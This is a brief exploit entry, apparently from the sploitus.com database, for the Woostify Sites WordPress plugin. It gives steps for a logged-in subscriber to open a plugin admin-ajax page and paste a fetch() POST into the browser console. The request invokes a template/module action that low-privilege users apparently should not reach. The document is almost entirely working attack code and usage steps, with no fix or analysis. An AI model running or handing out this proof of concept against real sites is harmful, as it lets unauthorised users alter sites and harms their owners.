Share
## https://sploitus.com/exploit?id=WPEX-ID:626BBC7D-0D0F-4418-AC61-666278A1CBDB
Login as subscriber, open https://example.com/wp-admin/admin-ajax.php?action=woostify_sites_child_theme&page=woostify-sites and run the below command in the developer console of the web browser 

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded; charset=UTF-8"},
"body":"action=woostify_sites_module_action&name=template&selected_index=0&ajax_nonce=" + woostify_sites_params['wpnonce'],  "method": "POST",}).then((response) => {return response.text();}).then((data) => {console.log(data);})